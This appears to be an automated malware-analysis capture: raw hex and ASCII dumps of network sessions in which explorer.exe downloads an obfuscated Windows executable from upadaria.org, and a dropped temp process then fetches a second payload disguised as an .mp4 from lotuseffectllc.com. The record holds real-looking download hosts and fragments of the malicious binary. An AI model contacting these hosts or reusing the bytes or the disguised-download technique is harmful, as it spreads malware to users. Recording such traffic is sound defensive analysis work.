                                                                                                                                                                                2024-12-30 18:45:11 UTC16384INData Raw: 8a 22 5b af 48 27 54 5b 1f 2b 41 ab ee dd 1d b8 c5 38 d9 ed 91 4d db 45 f0 f5 e1 23 ae fb 6e d2 f2 93 bd 7d bc 7d d0 65 60 54 e6 72 ad 05 1c dd 64 f5 9d eb b5 25 51 08 83 08 08 08 07 5d 6a e3 10 c4 4f 7e 44 13 35 cf 31 71 23 bf c7 72 4f 67 1f 93 0b ff fd 5b 89 a3 66 fc 26 05 7b 76 5a 26 3f 92 71 12 21 c4 09 7c 36 34 b8 11 d0 2c a9 e0 21 8a 64 4f bc 4b 73 58 be 6e 93 df 16 45 f6 30 28 97 fd e5 a7 ad ea 11 30 f6 89 3d cc ed ea c0 5b 7c e6 df b8 cf c8 21 ae fa 6e 00 37 66 7a 44 17 5d 9d d1 56 1b 45 dc cb 8e 6d 1d e7 26 39 7a b0 99 1b 52 34 00 f9 22 e6 36 c7 e1 4c e2 98 ae 9a 16 cb a3 ad 6f 3b b7 43 ed e9 ce 5a 68 30 f4 08 ef 5b 84 8f 2d 9e ce 58 78 22 6d 9a f4 98 90 e1 e1 d3 3f 80 04 00 97 16 5c d4 da c9 15 6f 1c c2 c9 28 41 89 72 ac 80 bd af eb 18 2a 8d dd
                                                                                                                                                                                Data Ascii: "[H'T[+A8ME#n}}e`Trd%Q]jO~D51q#rOg[f&{vZ&?q!|64,!dOKsXnE0(0=[|!n7fzD]VEm&9zR4"6Lo;CZh0[-Xx"m?\o(Ar*
                                                                                                                                                                                2024-12-30 18:45:11 UTC16384INData Raw: 0b cb 84 c4 15 bf 9b 48 bf 9d 91 1b ac 5c 81 5f 68 28 b9 11 03 90 c5 f1 28 02 64 09 4d c7 06 da a2 0a 82 d3 af 7b a2 96 2f db 71 40 4a 50 d2 dc 01 72 44 c6 5d 6e f9 10 02 40 fa d4 76 84 d0 72 a7 38 7d 42 9d 72 cb 22 18 ac 90 50 43 e7 b1 56 16 aa b9 a8 83 35 77 aa 3a da 40 5a 3b 07 75 5e 22 0a 8c 28 c4 d3 df 80 f8 e4 b9 81 92 06 b8 f8 69 ab b7 df 83 2b 29 0e 1c f0 bb cd 62 59 01 81 5b 4b a4 dc bd cf 24 4c 17 89 ca 6d 7f e0 c4 18 38 4b cc 33 24 e3 b3 a9 8e 1e fb 37 e0 a0 26 bf 0b 6f a2 ff c0 9c 6a 54 08 3d 1b ac f4 c9 24 cc 7f cc 84 d9 73 92 ae 34 b8 5c 47 44 c2 2c 38 0e f9 a9 2f fe 59 67 0c 53 69 dc 1d 64 2a 11 1f 53 2e 3e 72 18 04 14 a7 57 95 bd c4 b5 4c 8d 0b fa 87 ef 01 04 9f 8b 19 ff c4 2c 6b 73 04 05 f4 f3 f4 2b 4c 5f 76 b8 e3 af 39 dd 97 07 d7 19 fe
                                                                                                                                                                                Data Ascii: H\_h((dM{/q@JPrD]n@vr8}Br"PCV5w:@Z;u^"(i+)bY[K$Lm8K3$7&ojT=$s4\GD,8/YgSid*S.>rWL,ks+L_v9
                                                                                                                                                                                2024-12-30 18:45:11 UTC16384INData Raw: e1 04 45 ec e7 b9 1e de d4 54 af 7a 53 37 be 13 93 84 45 35 ba f8 58 b1 f1 71 5b 33 17 33 e4 0b b6 31 b4 e2 a3 c2 1f d1 49 64 76 6d 61 b9 82 62 88 e0 eb 55 38 2f ca 70 05 98 30 c1 be 28 e6 61 57 51 36 55 08 d1 50 98 21 eb 6d d2 36 1a a8 3c db f9 c5 6a b1 2d 56 98 fc 33 30 ba 87 4d d7 02 89 4d d3 0d bf 58 6a d4 e5 be cc ef 5b a6 f5 73 11 94 db 54 df 83 8b 2a 2c f2 55 01 58 06 52 43 c8 7f bb 91 42 7e 0b 15 5e eb 5c 27 d5 21 51 97 8c 94 c3 4e 7b b1 62 09 64 05 51 a1 79 7d c0 6d 60 cd fe 62 81 5a b3 cb 3e 9b 34 7f 1d 25 d0 fc 99 36 3f 9b 66 db b9 0c 96 9a 35 35 fc 93 80 45 e3 15 00 1e 71 b9 a7 d2 9e bd da a6 62 6c d2 bd c1 ce 52 71 a0 93 d4 e0 56 b7 1d 72 11 77 a7 8f 5a 02 3d f5 a5 0c 1a 38 bf 3f a0 b0 a9 0a f7 b1 8b e4 ad b9 2d 92 70 4c a5 cc 75 c3 72 a3 19
                                                                                                                                                                                Data Ascii: ETzS7E5Xq[331IdvmabU8/p0(aWQ6UP!m6<j-V30MMXj[sT*,UXRCB~^\'!QN{bdQy}m`bZ>4%6?f55EqblRqVrwZ=8?-pLur
                                                                                                                                                                                2024-12-30 18:45:11 UTC16384INData Raw: e4 74 5f 87 98 4d cb a0 66 92 6e d8 32 4e 37 e0 04 3f 27 bd 2f c2 80 ba d6 a1 a1 be 98 be 8a b3 db 0a 01 b6 4f 1f c7 e4 3e bf 3d 66 43 b9 9f 10 0e 50 4f 53 3f 7f 53 4e 59 b4 fb 4c 24 f4 d6 4b 66 49 c1 70 ce 00 5e 49 0e f6 7e a9 bf b0 d5 64 de 75 45 f4 a8 dc 77 f8 a5 68 f5 ae d7 74 9e 0a bd af 33 11 c6 0b a0 f0 50 61 a2 e9 37 c1 65 74 69 c0 b3 bd 9a a5 d0 34 76 51 92 eb 7d dd c0 84 90 4f 75 18 34 fe fa 20 4c ab bf 0f 45 c0 52 37 45 12 9a bd 83 7c a7 d0 65 e4 da a5 8b 6e 78 5e d1 c4 60 3d f8 8e 6f e9 9a 9e 74 c6 be af 60 2b c6 22 a1 1c 60 31 41 ce ed a8 2b db 1b 2b 95 4d 3d 1f 23 5c 5d df 2c da bb a3 bd e7 a6 58 d3 88 81 ae 39 30 84 a6 98 00 e8 ff 00 f3 29 6c 04 54 11 42 17 66 f8 01 46 e1 c9 fa d6 02 83 31 00 bc 6e 3f 78 6c e4 24 41 10 5e f0 38 a7 97 d7 25
                                                                                                                                                                                Data Ascii: t_Mfn2N7?'/O>=fCPOS?SNYL$KfIp^I~duEwht3Pa7eti4vQ}Ou4 LER7E|enx^`=ot`+"`1A++M=#\],X90)lTBfF1n?xl$A^8%
                                                                                                                                                                                2024-12-30 18:45:11 UTC16384INData Raw: 97 f7 5a a7 34 e6 dc dc 66 55 13 95 66 ba b3 33 16 c0 db b2 c3 37 b1 64 eb bc 09 63 ac 2d 86 12 de d1 64 02 23 5c 6a 46 9a 72 86 e1 24 07 81 16 a1 d0 ad b1 f8 7f 0c ee 14 9b 8b d7 13 a1 83 80 1e 07 78 62 aa 3b aa eb 7d 11 10 39 6d 57 bc e3 e8 5a d1 97 17 99 c4 25 f7 cb dc 93 1d e8 f1 50 78 07 82 6d da 0a fb 6a c2 21 e5 fe d4 8e bd 34 b1 ed 71 d4 2e 53 2f 43 70 29 d4 6c bd c2 63 46 f7 4b eb e7 13 f6 ad 90 f3 c6 78 98 40 24 49 d5 10 e4 d9 c7 e9 cc 4d 1b 52 26 db 7a 90 df bb 02 9c 03 70 59 7d 21 d1 9c 65 1f cf bb 94 ac f0 ad 92 2a f7 9e 6b ed cf 5c 32 76 8c e5 5d 1a 46 b2 8f ab 46 c7 b9 6b 1a 94 d7 c5 3d 9e af b5 13 9b a7 8e c6 37 52 ba 0d 40 35 64 16 a2 a9 19 7b f2 f8 db c1 44 17 4f f6 06 78 bd d3 63 e2 e4 37 39 b8 88 26 25 ac 4a 30 fd d6 ec 53 4b f0 52 89
                                                                                                                                                                                Data Ascii: Z4fUf37dc-d#\jFr$xb;}9mWZ%Pxmj!4q.S/Cp)lcFKx@$IMR&zpY}!e*k\2v]FFk=7R@5d{DOxc79&%J0SKR


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                1192.168.2.450064192.185.146.1364432580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-12-30 18:45:37 UTC162OUTGET /Vmujqcxm.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: upadaria.org
                                                                                                                                                                                2024-12-30 18:45:38 UTC250INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:37 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                Last-Modified: Fri, 27 Dec 2024 16:58:31 GMT
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Content-Length: 1401856
                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                2024-12-30 18:45:38 UTC7942INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 71 dc 6e 67 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 08 00 00 5a 15 00 00 08 00 00 00 00 00 00 de 79 15 00 00 20 00 00 00 80 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELqngZy @ `
                                                                                                                                                                                2024-12-30 18:45:38 UTC8000INData Raw: 03 00 50 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 30 00 00 00 05 00 00 00 38 2b 00 00 00 02 03 73 27 00 00 0a 7d 26 00 00 04 20 00 00 00 00 7e 26 09 00 04 7b 02 09 00 04 3a ce ff ff ff 26 20 00 00 00 00 38 c3 ff ff ff 2a 32 02 7c 27 00 00 04 28 26 00 00 0a 2a 00 00 00 13 30 03 00 50 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 30 00 00 00 05 00 00 00 38 2b 00 00 00 02 03 73 27 00 00 0a 7d 27 00 00 04 20 00 00 00 00 7e 26 09 00 04 7b 28 09 00 04 39 ce ff ff ff 26 20 00 00 00 00 38 c3 ff ff ff 2a 32 02 7c 28 00 00 04 28 28 00 00 0a 2a 00 00 00 13 30 03 00 50 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 05 00 00 00 06 00
                                                                                                                                                                                Data Ascii: P 8E08+s'}& ~&{:& 8*2|'(&*0P 8E08+s'}' ~&{(9& 8*2|(((*0P 8E
                                                                                                                                                                                2024-12-30 18:45:38 UTC8000INData Raw: 04 2a 1e 02 7b 38 00 00 04 2a 13 30 03 00 9f 00 00 00 01 00 00 11 02 28 1d 00 00 0a 20 02 00 00 00 38 09 00 00 00 38 eb ff ff ff fe 0c 00 00 45 04 00 00 00 05 00 00 00 62 00 00 00 06 00 00 00 31 00 00 00 38 00 00 00 00 2a 03 14 28 09 00 00 0a 3a 1f 00 00 00 20 00 00 00 00 7e 26 09 00 04 7b 00 09 00 04 39 c5 ff ff ff 26 20 01 00 00 00 38 ba ff ff ff 72 97 04 00 70 73 24 00 00 0a 7a 02 03 7d 37 00 00 04 20 00 00 00 00 7e 26 09 00 04 7b d8 08 00 04 3a 94 ff ff ff 26 20 00 00 00 00 38 89 ff ff ff 38 d5 ff ff ff 20 03 00 00 00 38 7a ff ff ff 00 13 30 03 00 68 00 00 00 01 00 00 11 02 03 28 be 00 00 06 20 00 00 00 00 7e 26 09 00 04 7b 10 09 00 04 3a 14 00 00 00 26 20 00 00 00 00 38 09 00 00 00 38 d5 ff ff ff fe 0c 00 00 45 02 00 00 00 05 00 00 00 2b 00 00 00 38
                                                                                                                                                                                Data Ascii: *{8*0( 88Eb18*(: ~&{9& 8rps$z}7 ~&{:& 88 8z0h( ~&{:& 88E+8
                                                                                                                                                                                2024-12-30 18:45:38 UTC8000INData Raw: 58 2a 38 f3 ff ff ff 20 03 00 00 00 38 c7 ff ff ff 02 6f 32 01 00 06 28 c6 07 00 06 39 0a 00 00 00 20 02 00 00 00 38 ad ff ff ff 02 7c 64 00 00 04 7b 4a 00 00 04 3a c2 ff ff ff 20 01 00 00 00 7e 26 09 00 04 7b c5 08 00 04 39 89 ff ff ff 26 20 00 00 00 00 38 7e ff ff ff 02 7b 6c 00 00 04 25 39 05 00 00 00 38 26 00 00 00 26 20 04 00 00 00 7e 26 09 00 04 7b c6 08 00 04 3a 58 ff ff ff 26 20 00 00 00 00 38 4d ff ff ff 16 38 05 00 00 00 28 5e 00 00 0a 13 00 20 00 00 00 00 7e 26 09 00 04 7b f2 08 00 04 3a 2c ff ff ff 26 20 00 00 00 00 38 21 ff ff ff 00 00 00 13 30 03 00 6a 01 00 00 20 00 00 11 20 06 00 00 00 fe 0e 02 00 38 00 00 00 00 fe 0c 02 00 45 08 00 00 00 11 00 00 00 05 00 00 00 a8 00 00 00 b6 00 00 00 6e 00 00 00 38 00 00 00 54 00 00 00 84 00 00 00 38 0c
                                                                                                                                                                                Data Ascii: X*8 8o2(9 8|d{J: ~&{9& 8~{l%98&& ~&{:X& 8M8(^ ~&{:,& 8!0j 8En8T8
                                                                                                                                                                                2024-12-30 18:45:38 UTC8000INData Raw: 06 20 0b 00 00 00 38 a5 ff ff ff 2a 2a 02 05 28 56 01 00 06 20 05 00 00 00 38 92 ff ff ff 2a 02 1b 7d 63 00 00 04 20 0d 00 00 00 38 80 ff ff ff 2a 02 1f 0f 28 58 01 00 06 20 06 00 00 00 7e 26 09 00 04 7b 00 09 00 04 3a 63 ff ff ff 26 20 03 00 00 00 38 58 ff ff ff 2a 02 19 7d 63 00 00 04 20 0e 00 00 00 7e 26 09 00 04 7b 21 09 00 04 39 3c ff ff ff 26 20 05 00 00 00 38 31 ff ff ff 02 19 28 3b 01 00 06 20 0c 00 00 00 38 20 ff ff ff 2a 02 1f 0e 28 58 01 00 06 20 0a 00 00 00 7e 26 09 00 04 7b f7 08 00 04 39 03 ff ff ff 26 20 02 00 00 00 38 f8 fe ff ff 02 03 7d 60 00 00 04 20 07 00 00 00 38 e7 fe ff ff 03 17 59 45 11 00 00 00 44 ff ff ff 0a ff ff ff 1d 00 00 00 0b 00 00 00 f6 fe ff ff f8 fe ff ff f8 fe ff ff f8 fe ff ff f8 fe ff ff f8 fe ff ff f8 fe ff ff f8 fe
                                                                                                                                                                                Data Ascii: 8**(V 8*}c 8*(X ~&{:c& 8X*}c ~&{!9<& 81(; 8 *(X ~&{9& 8}` 8YED
                                                                                                                                                                                2024-12-30 18:45:38 UTC8000INData Raw: 20 01 00 00 00 38 97 ff ff ff 11 01 02 7b 94 00 00 04 6f 12 01 00 06 16 6f 9b 00 00 0a 13 02 20 08 00 00 00 38 78 ff ff ff 12 03 28 9c 00 00 0a 3a 0a 00 00 00 20 02 00 00 00 38 62 ff ff ff 12 03 28 9e 00 00 0a 39 dc 00 00 00 20 00 00 00 00 7e 26 09 00 04 7b 17 09 00 04 3a 42 ff ff ff 26 20 00 00 00 00 38 37 ff ff ff 12 02 28 9d 00 00 0a 13 03 20 0a 00 00 00 38 24 ff ff ff dd cf fe ff ff 20 0c 00 00 00 38 15 ff ff ff 38 9e 00 00 00 20 01 00 00 00 7e 26 09 00 04 7b e6 08 00 04 3a fc fe ff ff 26 20 05 00 00 00 38 f1 fe ff ff 02 15 25 13 00 7d 91 00 00 04 20 09 00 00 00 38 dd fe ff ff 38 1a ff ff ff 20 06 00 00 00 38 ce fe ff ff 02 7c 95 00 00 04 fe 15 18 00 00 1b 20 07 00 00 00 38 b8 fe ff ff 02 11 03 7d 95 00 00 04 20 03 00 00 00 38 a6 fe ff ff 02 16 25 13
                                                                                                                                                                                Data Ascii: 8{oo 8x(: 8b(9 ~&{:B& 87( 8$ 88 ~&{:& 8%} 88 8| 8} 8%
                                                                                                                                                                                2024-12-30 18:45:38 UTC8000INData Raw: 00 00 02 7b ba 00 00 04 13 00 20 00 00 00 00 7e 26 09 00 04 7b b9 08 00 04 39 ce ff ff ff 26 20 01 00 00 00 38 c3 ff ff ff 17 2a 12 00 28 28 00 00 0a 2a 12 00 28 b0 00 00 0a 3a ec ff ff ff 20 00 00 00 00 7e 26 09 00 04 7b bd 08 00 04 39 99 ff ff ff 26 20 00 00 00 00 38 8e ff ff ff 13 30 03 00 50 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 05 00 00 00 06 00 00 00 38 00 00 00 00 2a 02 03 73 29 00 00 0a 7d ba 00 00 04 20 00 00 00 00 7e 26 09 00 04 7b 29 09 00 04 3a cd ff ff ff 26 20 00 00 00 00 38 c2 ff ff ff 32 02 7c bc 00 00 04 28 28 00 00 0a 2a 00 00 00 13 30 03 00 50 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 05 00 00 00 06 00 00 00 38 00 00 00 00 2a 02 03 73 29
                                                                                                                                                                                Data Ascii: { ~&{9& 8*((*(: ~&{9& 80P 8E8*s)} ~&{):& 82|((*0P 8E8*s)
                                                                                                                                                                                2024-12-30 18:45:38 UTC8000INData Raw: 26 20 00 00 00 00 38 c1 ff ff ff 00 00 00 13 30 05 00 4d 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 2d 00 00 00 05 00 00 00 38 28 00 00 00 02 03 04 05 6f e9 01 00 06 20 00 00 00 00 7e 26 09 00 04 7b 2c 09 00 04 39 d1 ff ff ff 26 20 00 00 00 00 38 c6 ff ff ff 2a 00 00 00 13 30 05 00 52 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 32 00 00 00 05 00 00 00 38 2d 00 00 00 02 03 73 dc 03 00 06 04 05 28 e5 01 00 06 20 00 00 00 00 7e 26 09 00 04 7b ca 08 00 04 39 cc ff ff ff 26 20 00 00 00 00 38 c1 ff ff ff 2a 00 00 13 30 05 00 4d 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 2d 00 00 00 05 00 00 00 38 28 00 00 00 02 03 04 14 6f
                                                                                                                                                                                Data Ascii: & 80M 8E-8(o ~&{,9& 8*0R 8E28-s( ~&{9& 8*0M 8E-8(o
                                                                                                                                                                                2024-12-30 18:45:38 UTC8000INData Raw: 0c 00 00 45 20 00 00 00 55 03 00 00 a3 00 00 00 1b 00 00 00 51 01 00 00 3c 02 00 00 93 02 00 00 6c 01 00 00 35 00 00 00 3f 03 00 00 10 01 00 00 3b 01 00 00 82 01 00 00 80 03 00 00 b6 01 00 00 96 03 00 00 05 00 00 00 61 00 00 00 78 00 00 00 e9 02 00 00 7d 02 00 00 67 02 00 00 14 03 00 00 cf 00 00 00 fb 01 00 00 62 00 00 00 b9 00 00 00 4b 00 00 00 11 02 00 00 e1 01 00 00 9c 01 00 00 e5 00 00 00 be 02 00 00 38 50 03 00 00 02 03 7b cf 00 00 04 7d cf 00 00 04 20 0e 00 00 00 38 60 ff ff ff 02 03 7b d7 00 00 04 7d d7 00 00 04 20 03 00 00 00 fe 0e 00 00 38 42 ff ff ff 02 03 7b d8 00 00 04 7d d8 00 00 04 20 15 00 00 00 38 30 ff ff ff 02 03 7b cb 00 00 04 7d cb 00 00 04 20 0a 00 00 00 38 1a ff ff ff 2a 02 03 7b cc 00 00 04 7d cc 00 00 04 20 1a 00 00 00 38 03 ff ff
                                                                                                                                                                                Data Ascii: E UQ<l5?;ax}gbK8P{} 8`{} 8B{} 80{} 8*{} 8
                                                                                                                                                                                2024-12-30 18:45:38 UTC8000INData Raw: 00 05 00 00 00 38 53 00 00 00 02 02 7b ef 00 00 04 17 58 7d ef 00 00 04 20 01 00 00 00 7e 26 09 00 04 7b 0c 09 00 04 3a c8 ff ff ff 26 20 01 00 00 00 38 bd ff ff ff 02 03 7d ee 00 00 04 20 00 00 00 00 7e 26 09 00 04 7b e3 08 00 04 3a a2 ff ff ff 26 20 00 00 00 00 38 97 ff ff ff 2a 13 30 04 00 bf 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 5a 00 00 00 05 00 00 00 32 00 00 00 7f 00 00 00 33 00 00 00 38 55 00 00 00 02 02 7b ed 00 00 04 17 58 7d ed 00 00 04 20 00 00 00 00 7e 26 09 00 04 7b bd 08 00 04 39 c0 ff ff ff 26 20 00 00 00 00 38 b5 ff ff ff 2a 02 03 04 28 77 02 00 06 20 02 00 00 00 7e 26 09 00 04 7b e7 08 00 04 3a 98 ff ff ff 26 20 02 00 00 00 38 8d ff ff ff 02 28 79 02 00 06 20 00 00 00 00 7e 26 09 00 04
                                                                                                                                                                                Data Ascii: 8S{X} ~&{:& 8} ~&{:& 8*0 8EZ238U{X} ~&{9& 8*(w ~&{:& 8(y ~&


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                2192.168.2.450067192.185.175.1584435796C:\Users\user\AppData\Local\Temp\3E6C.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-12-30 18:45:41 UTC103OUTGET /plugins/panel/uploads/Mwczjtflz.mp4 HTTP/1.1
                                                                                                                                                                                Host: lotuseffectllc.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2024-12-30 18:45:41 UTC235INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:41 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                Last-Modified: Fri, 27 Dec 2024 16:57:13 GMT
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Content-Length: 1229832
                                                                                                                                                                                Content-Type: video/mp4
                                                                                                                                                                                2024-12-30 18:45:41 UTC7957INData Raw: 26 f5 50 a6 f1 5f 38 77 13 ec 6a 95 0b 10 d0 14 09 37 a8 1e 05 95 8e 97 24 66 a2 8d 1a 9e bb a9 fb 8e a5 e1 a7 c3 56 85 5e 70 5c 50 64 ef 83 6e 5a 2f 0b 9f a3 44 5c bc 01 a3 a9 49 40 1d c5 fe 39 86 39 bc 2a f3 24 86 c7 a2 f8 6e 39 56 01 c4 0e 8f 41 0b b7 44 b6 9b cb 4a c4 ea b3 99 97 93 4e 7d d5 cd ab 66 af 2f 66 3d 89 a1 a2 3d a7 08 68 da ff a2 49 37 33 8d d0 bb 13 2e 6e b5 88 19 7f 75 0d 02 80 c8 1b ad 1d a3 e8 17 37 f5 f4 0f c4 d8 28 60 28 a8 3a df 51 91 b1 78 2e 2d bf e4 a0 9a 33 b1 35 7e e3 79 89 77 ee 07 9b 5e 14 33 01 ef 39 1b 4a de 9c ed 85 1f 82 71 0f c2 82 ec 68 fb ac f6 1c 3f d3 6b 1b e4 a7 95 77 a7 36 4a 5d 41 82 09 66 58 e1 29 bd d7 2e 6e b6 a5 a9 ce 9a 49 4c 62 ff d1 ed 1c a4 5d e8 fd 18 cc b6 91 be 05 21 9e 92 85 6b ca 1a ec b1 04 ed e9 3c
                                                                                                                                                                                Data Ascii: &P_8wj7$fV^p\PdnZ/D\I@99*$n9VADJN}f/f==hI73.nu7(`(:Qx.-35~yw^39Jqh?kw6J]AfX).nILb]!k<
                                                                                                                                                                                2024-12-30 18:45:41 UTC8000INData Raw: 0c 33 da 5e 79 09 98 90 52 e5 46 57 2a b2 5e a8 04 a0 7b 40 3a f6 3a d8 72 40 fc 4f 55 92 07 bd 97 7b 1b c5 5a e8 1e 87 22 e1 a8 b8 e1 c6 17 b8 ee 12 2e a4 25 d3 aa db ed ee 5c 71 b9 58 4c 76 ed c6 74 60 97 3a 39 73 ef 8a c6 f8 9d 92 86 04 a4 b6 27 ca a3 e1 dc d5 07 49 d2 81 58 48 a4 1b 73 2a 4e 26 d2 02 20 47 ae 0a 95 69 74 4b 45 ab 22 ec 98 0d f0 e3 32 c6 39 98 c1 66 33 ff 5a e0 28 26 00 7e e2 4e 15 7c a2 5e 1f 2d 65 bc 35 46 7e b1 f1 47 1a b1 32 e1 aa 33 0f a5 94 58 59 c4 da 4c 0c 58 47 6a f3 ff 90 bb 56 58 9e 10 e5 2c 63 6d c1 64 db e4 7b 68 70 f8 7b ae 2a 55 b5 63 f7 4d f5 6f c5 ed db a7 f2 b4 0d 12 c9 7a 09 3b 0d 4d 97 f8 8d 05 e3 bb 63 13 69 0e ec 09 eb c3 26 88 73 63 81 f4 69 5f 7b cd 6e fc 81 47 d0 da b3 d8 73 a8 f5 c5 fd 6f 23 17 db 69 1a be 22
                                                                                                                                                                                Data Ascii: 3^yRFW*^{@::r@OU{Z".%\qXLvt`:9s'IXHs*N& GitKE"29f3Z(&~N|^-e5F~G23XYLXGjVX,cmd{hp{*UcMoz;Mci&sci_{nGso#i"
                                                                                                                                                                                2024-12-30 18:45:41 UTC8000INData Raw: 41 6c 6d 49 00 99 d5 80 7c ab fc 70 92 cd f3 7c 66 28 ba a0 af bc 41 b2 15 f8 3d a3 bc 24 c4 9c 61 a0 82 5e 28 a1 71 b1 c6 1c cc 11 0b 0b ca e5 f4 cb 44 c8 b2 97 eb ce 63 c3 a6 70 ae 9c e7 59 c4 03 0f 08 0b 65 65 f6 b4 ca 58 fd 72 e1 21 24 f2 79 19 3d 27 6a 36 3e 7c ce 52 d2 21 0e f2 b5 10 33 f2 19 51 f1 12 0e c4 7d e0 f0 8d ab 9a 1c 22 7e ec bc 49 e8 a7 0d d6 02 15 10 59 1f cd 9c df 11 dc 3f 4c 47 1b 03 a9 c5 06 13 16 70 ed 15 ac 08 f7 44 44 b5 7a f3 f2 19 66 ed 2f b4 c5 41 75 1b e3 0e 78 29 d7 dd bd a9 31 5f 5e da 49 ce 7d d0 e8 d7 70 af 37 21 30 15 e9 be a3 4b 51 b0 3d 17 a0 5f 9a 45 8b 99 b5 9e 9c 7b a6 a4 f5 5b d9 ba 28 77 60 6e b7 81 87 49 b6 88 35 2d 94 65 dc 96 c4 4f 0c bd 0d a2 14 b5 a4 a3 f5 14 4d e2 01 12 a8 37 02 e0 1a a3 2b 01 b9 04 01 3f 3b
                                                                                                                                                                                Data Ascii: AlmI|p|f(A=$a^(qDcpYeeXr!$y='j6>|R!3Q}"~IY?LGpDDzf/Aux)1_^I}p7!0KQ=_E{[(w`nI5-eOM7+?;
                                                                                                                                                                                2024-12-30 18:45:41 UTC8000INData Raw: 52 7d 67 74 32 8e 7a 9e 28 ea 60 9f 1f f9 e3 ef b0 a6 61 a4 f2 4f ef 4d 82 92 fd c6 66 a1 3d b4 8a ae 5d 3b 1b 03 7b 61 40 3e a9 48 ce 0c 25 b0 f1 40 a8 2a e8 7e 54 9c 50 ff 80 79 8f 99 10 fc d6 a8 90 50 ca 02 b4 d9 d5 9e b9 9d fe c7 5e a7 f0 1b f0 26 c2 8a 91 90 0c df e4 60 9b cb dc f1 39 ea e2 79 80 76 14 fa 62 b9 5a 04 ed b0 84 98 95 f2 a8 74 d4 a7 72 e0 d3 61 4d 28 70 bf 00 7e 65 e6 b3 ee bf e4 60 97 ed af 86 ed 4f 27 af b3 82 e7 c6 6e 79 3a a1 7f 2b 53 06 31 2e a3 e6 9c 94 42 ea a3 60 4e cb 64 95 15 60 46 3c 9d b6 40 88 d0 99 74 a8 21 bc b1 d1 09 63 57 27 2f 62 af 7a 51 7a 27 43 31 99 a1 d1 fe 5e 36 3e d3 df 03 c6 81 34 55 a2 43 15 2f 34 ff 72 51 3b 76 42 b7 a2 2a ec 0b 88 d3 7a 84 a7 aa 69 ac dd db 54 30 13 5b 0f ae fb 94 95 29 d0 1a be f4 7f 1e db
                                                                                                                                                                                Data Ascii: R}gt2z(`aOMf=];{a@>H%@*~TPyP^&`9yvbZtraM(p~e`O'ny:+S1.B`Nd`F<@t!cW'/bzQz'C1^6>4UC/4rQ;vB*ziT0[)
